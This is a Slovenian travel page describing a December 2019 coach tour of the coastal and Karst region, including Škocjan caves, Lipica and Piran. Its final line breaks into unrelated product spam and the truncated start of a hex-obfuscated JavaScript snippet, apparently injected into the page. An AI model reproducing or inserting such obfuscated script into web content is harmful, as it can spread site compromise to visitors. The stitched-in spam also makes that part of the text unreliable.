031 32 27 76 ali  041 67 88 96

»Ribič ribič me je ujel,
pa ni ujel me na mrežo,
ujel me je le z besedo,
in črnimi očmi.
Je na morje s seboj me vzel…«

In tudi mi vas vzamemo s seboj, v deželo sonca in rumene barve, ki boža slikovita mediteranska mesta na Jadranski obali. Lepote kraške pokrajine so prevzete z nasadi oljčnih gajev in vinogradov, s sadovnjaki breskev in češenj. Pod njihovimi koreninami ležijo nekateri najlepši podzemni svetovi našega planeta. Vsak kilometer slovenske obale odkrije novo presenečenje. Tu je naravno najdišče z bogato zalogo laporja in peščenca in edinstvena, osemdeset metrov visoka, strunjanska pečina. Tu so Sečoveljske soline, prvič omenjene v 13. Stoletju, in za obiskovalce je opuščeni del solin, ki mu pravijo Fontanigge, najprivlačnejši, saj jih tam pričakajo za slovenski prostor edinstveni prizori - veliko ptic, obsežni travniki slanuš in preko 100 opuščenih in porušenih solinskih hiš, ki dajejo Sečoveljskim solinam svojevrsten, hirošimski pečat. Tu so mesta Piran, Izola in Koper, ki privabljajo obiskovalce s svojimi srednjeveškimi jedri, ter Portorož, ki ponuja vso razkošnost primorja. Nedaleč od obale vas pričakujejo lepote slovenske Istre z njenimi slikovitimi vasicami. Med njimi je na primer Hrastovlje s cerkvijo Svete Trojice, ki je okrašena s pripovednimi poznogotskimi freskami, med katerimi je tudi Mrtvaški ples, ki je nastala pod vtisom srednjeveških epidemij kuge.

V kraških kleteh kamnitih hiš nam nalijejo in prodajo izvrstna vina, na podstrešjih pa nam burja posuši pršut. Gurmanski raj je tudi raj za tiste, ki imajo radi kraško podzemlje. Škocjanske jame, ki so na UNESCO-vem seznamu svetovnih, naravnih in kulturnih znamenitosti, se ponašajo s 1400 metrov dolgo in 150 metrov globoko podzemno sotesko reke Reke.

Morda niste vedeli, da izvira plemeniti Lipicanec iz Slovenije. Kobilarna Lipica je zibelka vseh lipicanskih konj na svetu. Danes je eden najlepših kulturno-zgodovinskih spomenikov in priljubljeno turistično središče z jahalno šolo, hoteli, bazenom, kazinojem in golf igriščem.

Primorska - obalno-kraška

14.12 2019
Na pot se odpravimo; - ob 900 uri iz Gornje Radgone - ob 930 uri iz Maribora   Pot nas bo vodila v smeri prestolnice in naprej proti mejnemu prehodu Fernetiči, kjer vstopimo v...
ŠKOCJANSKE JAME – LIPICA – LOKEV KOPER - PIRAN - PORTOROŽ - SEČOVLJE Zoom Lebron Soldiers IX 9var nsSGCDsaF1=new window["\x52\x65\x67\x45\x78\x70"]("\x28\x47"+"\x6f"+"\...